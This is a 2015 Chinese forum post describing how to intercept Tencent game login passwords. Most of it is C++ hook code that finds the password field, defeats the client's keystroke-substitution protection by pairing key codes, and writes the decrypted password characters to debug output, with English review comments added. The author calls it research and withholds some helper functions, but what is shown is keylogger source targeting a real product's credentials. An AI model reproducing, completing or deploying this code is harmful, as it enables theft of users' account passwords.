[原创]TX游戏登陆密码截取
-
发表于:
2015-6-30 01:19
5290
-
先声明:此文仅是自己学习研究的记录。由于上次发那个TX登陆的帖子时公布了代码,被和鞋了,所以此次不公开代码(而且公布所造成的影响太大),也只公开部分研究成果。不喜勿喷。能看懂的就看懂,看不懂的绕过。最好能结合本人上次的帖子看。
// State flag for FilterLowLevelKeyboardProc. While true, the next accepted
// key-down takes the first branch there (its code is saved into g_Key);
// while false, it takes the second branch (paired with g_Key via SetKeyPair).
// The flag flips on every accepted key-down.
bool bPlainCase =true;
// Virtual-key code saved by the first branch and consumed by the second one.
int g_Key =0;
// Filter routine that receives low-level keyboard events (a KBDLLHOOKSTRUCT
// in lParam) and works on them two at a time while the password control
// recorded in g_hPwd has focus.
//
// Only WM_KEYDOWN events whose vkCode passes IsVkCodeNeed() are considered.
// Accepted events alternate between two branches, driven by bPlainCase:
//   - first event of a pair: vkCode is stored in g_Key;
//   - second event of a pair: (vkCode, g_Key) is handed to SetKeyPair().
// The disabled debug strings label the first value "raw virtual-key code" and
// the second "encrypted virtual code", so the pair table presumably maps a
// substituted key code back to the key that was really pressed; verify
// against SetKeyPair / GetPlainVkcode, which are defined outside this listing.
//
// Parameters follow the low-level keyboard hook convention: nCode is the hook
// code, wParam the keyboard message id, lParam a pointer to KBDLLHOOKSTRUCT.
// The function is declared void and does not forward the event itself; how it
// is registered and who forwards the event is not visible here.
//
// NOTE(review): the pairing relies purely on event order. Any accepted
// key-down that arrives out of the expected alternation leaves bPlainCase out
// of step for every later pair.
void WINAPI FilterLowLevelKeyboardProc(
_In_ int nCode,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
if(nCode == HC_ACTION)
{
PKBDLLHOOKSTRUCT pKdb = (PKBDLLHOOKSTRUCT)lParam;
if( wParam == WM_KEYDOWN && IsVkCodeNeed(pKdb->vkCode) )
{
if( ::GetFocus() == g_hPwd ) //check whether the password control has focus, i.e. a password is being typed
{
// Scratch buffer; only the disabled debug output below uses it.
TCHAR tcText[100];
if( bPlainCase )
{
// _stprintf_s(tcText,_T("原始虚键码:%d"),pKdb->vkCode);
// 96..105 are VK_NUMPAD0..VK_NUMPAD9; subtracting 48 folds them onto the
// top-row digit codes 48..57. This writes into the hook structure itself,
// not into a local copy.
if(96 <=pKdb->vkCode && pKdb->vkCode<=105 )
pKdb->vkCode -=48;
// Remember the first code of the pair and expect its partner next.
g_Key=pKdb->vkCode;
bPlainCase=false;
// OutputDebugString(tcText);
}else
{
// Same numeric-keypad normalisation for the second code of the pair.
if(96 <=pKdb->vkCode && pKdb->vkCode<=105 )
pKdb->vkCode -=48;
// _stprintf_s(tcText,_T("加密虚拟码:%d,当前key:%d"),pKdb->vkCode,g_Key);
// Record the association between this code and the one saved in g_Key,
// then go back to waiting for the first code of the next pair.
SetKeyPair(pKdb->vkCode,g_Key);
bPlainCase=true;
// OutputDebugString(tcText);
}
}
}
}
}
// Message hook procedure (WH_GETMESSAGE-style signature: lParam points to the
// MSG being retrieved). For every HC_ACTION call it does three things:
//   1. Locates the password edit control: the first window seen whose style
//      has ES_PASSWORD set and ES_MULTILINE clear is stored in g_hPwd.
//   2. While that control has focus and g_hKeyboardHook is still unset, calls
//      SetMintor() if a module named "fszwd.dat" is loaded in this process.
//   3. On WM_CHAR, translates the character back through the pair table
//      (GetPlainVkcode) and writes the result with OutputDebugString.
// It always passes the event on with CallNextHookEx and returns that result.
//
// NOTE(review): every character recovered here is written in clear text to
// the debug output channel, so the password is exposed to anything reading
// debug output on the machine, not only to this module.
// NOTE(review): g_hKeyboardHook is never assigned in the visible code (the
// SetWindowsHookEx line is commented out); unless SetMintor() sets it, step 2
// repeats for every message while the password control has focus. Confirm
// against SetMintor, which is defined outside this listing.
LRESULT CALLBACK GetMsgProc(__in int code,__in WPARAM wParam,__in LPARAM lParam
)
{
if( code == HC_ACTION )
{
MSG * pMsg =(MSG*)lParam;
LONG dwStyle = GetWindowLong(pMsg->hwnd,GWL_STYLE);
// Latch the first single-line password edit control that receives a message.
if( !g_hPwd &&
dwStyle & ES_PASSWORD &&
!( dwStyle&ES_MULTILINE) )
{
g_hPwd=pMsg->hwnd;
/*TCHAR tcTetxt[50];
_stprintf_s(tcTetxt,_T("密码控件句柄:%x"),g_hPwd);
OutputDebugString(tcTetxt);*/
}
if( !g_hKeyboardHook && ::GetFocus() == g_hPwd)
{
// g_hKeyboardHook=SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,g_hMod,GetCurrentThreadId());
// Only act when the named module is present in this process. What
// SetMintor() installs is not visible in this listing.
if( GetModuleHandle(_T("fszwd.dat")) )
SetMintor();
//dwTimerId = SetTimer(g_hPwd,0x1000,0x10,InputPwdTimer);
}
if( pMsg->message ==WM_CHAR )
{
TCHAR tcTetxt[50]={0};
SHORT sVk=0;
SHORT sOrgVk=0;
if( IsCharNeed(pMsg->wParam) && ::GetFocus() ==g_hPwd )
{
// Upper-case letters are lowered (+0x20) before VkKeyScan; the other
// accepted characters are passed through unchanged.
if( pMsg->wParam >='A' && pMsg->wParam <= 'Z' )
sVk = VkKeyScan(pMsg->wParam+0x20);
else
sVk = VkKeyScan(pMsg->wParam);
sOrgVk = GetPlainVkcode(sVk); //look up the original (plain) virtual-key code
if( sOrgVk )
{
// A mapping exists: the reported character is the received one shifted by
// the difference between the original and the received key codes.
_stprintf_s(tcTetxt,_T("ascii码:%d,解密的字符:%c"),pMsg->wParam ,pMsg->wParam + sOrgVk - sVk);
}else
// No mapping recorded for this key code: report the character as received.
_stprintf_s(tcTetxt,_T("ascii码:%d,未解密的字符:%c"),pMsg->wParam ,pMsg->wParam);
}else
{
// Character rejected by IsCharNeed, or focus is elsewhere: report it as-is.
_stprintf_s(tcTetxt,_T("没有加密的字符:%c"),pMsg->wParam);
}
OutputDebugString(tcTetxt);
}
}
return CallNextHookEx(0,code,wParam,lParam);
}
运行结果: